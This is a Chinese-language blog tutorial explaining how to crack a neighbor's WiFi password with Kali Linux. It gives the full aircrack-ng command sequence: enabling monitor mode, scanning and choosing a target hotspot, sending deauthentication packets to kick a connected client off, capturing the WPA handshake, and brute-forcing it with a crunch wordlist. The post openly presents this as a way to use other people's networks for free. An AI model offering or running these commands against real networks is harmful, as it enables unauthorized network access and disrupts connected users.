如何用Kali破解邻居家WiFi技术,学习,新花样,大神操作

By admin

2019-08-09 11:17:39

浏览量72

已赞0

前言
临近春节,想必大家都已经回到老家准备过年了吧。这个时候,很多人出现了新的困惑,老家没网没WiFi,怎么破?流量烧不起啊……
对Kali Linux的学习也有段时间了,之前主要集中在Web层面的一些应用。最近对无线Hacker比较感兴趣,包括WiFi破解、Kali实现钓鱼WiFi以及GSM嗅探等。今天先分享下Kali下面破解WiFi的一个简明教程吧!

0x01 开始前的准备
环境:Kali Rolling/Kali2016.1 (WMware 11)
设备:Ralink 802.11 n WLAN(淘宝即可购得,新版kali兼容大量无线网卡驱动,找一款能兼容的外置无线网卡即可)
所需软件:aircrack(Kali自带自带)

关于Kali linux版本的说明:
Kali linux经历了从kali 1.0 到kali 2.0,再从2.0到现在的Rolling版本的过渡。可能你见过kali 2016.1 、kali 2016.2这两个版本,其实它们都属于kali Rolling版本。rolling即指滚动更新,意味着kali不会再出3.0之类的版本了,会一直延续rolling实时更新。


首先把外置无线网卡插入电脑,然后加载入当前kali虚拟机。完成后用`ifconfig`命令查看无线网卡是否安装成功:如图wlan0

并将wlan0网卡开启混杂模式:

[AppleScript] 纯文本查看 复制代码

?

1

2

3

4

airmon-ng start wlan0

#提示要杀掉一些进程,根据提示进行即可

airmon-ng check kill

airmon-ng start wlan0





0x02 开始抓取握手包
1. 首先,查看附近WiFi热点,使用命令`airodump-ng wlan0mon`


2. 选取其中信号较好的WiFi热点,在这里我们选取一个目标(4227X)

3.使用airodump-ng对选取的WiFi热点进行cap监听与获取:

[AppleScript] 纯文本查看 复制代码

?

1

2

3

4

5

6

airodump-ng -c 11 --bssid EC:26:CA:34:OA:2C -w 4227X  wlan0mon

 

-c 通道值 WiFi热点所对应的CH值(上图中可看到)

--bssid 需要破解WiFi的MAC值

-w cap文件名

wlan0mon 启用混杂模式的网卡名





4. 可以看到4227X这个WiFi热点下有7个设备正在连接中,选取其中一个你喜欢的,进行断网从而抓取之握手包:

[AppleScript] 纯文本查看 复制代码

?

1

2

3

4

5

aireplay-ng -0 20 -c 64:5A:04:34:5A:0A -a EC:26:CA:34:OA:2C wlanmon

 

-0 death模式,20为发送次数

-c 你所选择要断网操作的客户机MAC

-a WiFi热点MAC



如图,可以看到握手包已经抓取到了,接下来就是破解操作了!


0x03 暴力破解
1. 首先需要一个字典,可以找网上现成的,或者用工具生成一个字典,这里我们用crunch生成一个简单字典:


2.开始跑握手包

[AppleScript] 纯文本查看 复制代码

?

1

2

#首先ls查看当前目录所产生的握手包

aircrack-ng -w die.txt 4227X-01.cap





3. 字典的设置还是比较关键的!当出现Key Found 的时候表明你成功了!


总结
其实这仅仅是WiFi破解的其中一种简单的方法,这里用了最新版本的kali linux系统。其实kali在无线渗透方面很有优势,集成了各种专用软件。当然,小巧的CDlinux也可以破解WiFi,不过对于网卡的支持没有kali多。而且如果你是一名渗透学习者的话,建议使用kali。
发表评论
拖动滑块验证
»
请先 注册/登录 后参与评论

已有0 发布

默认   热门   正序   倒序
    查看更多评论
    已有0次打赏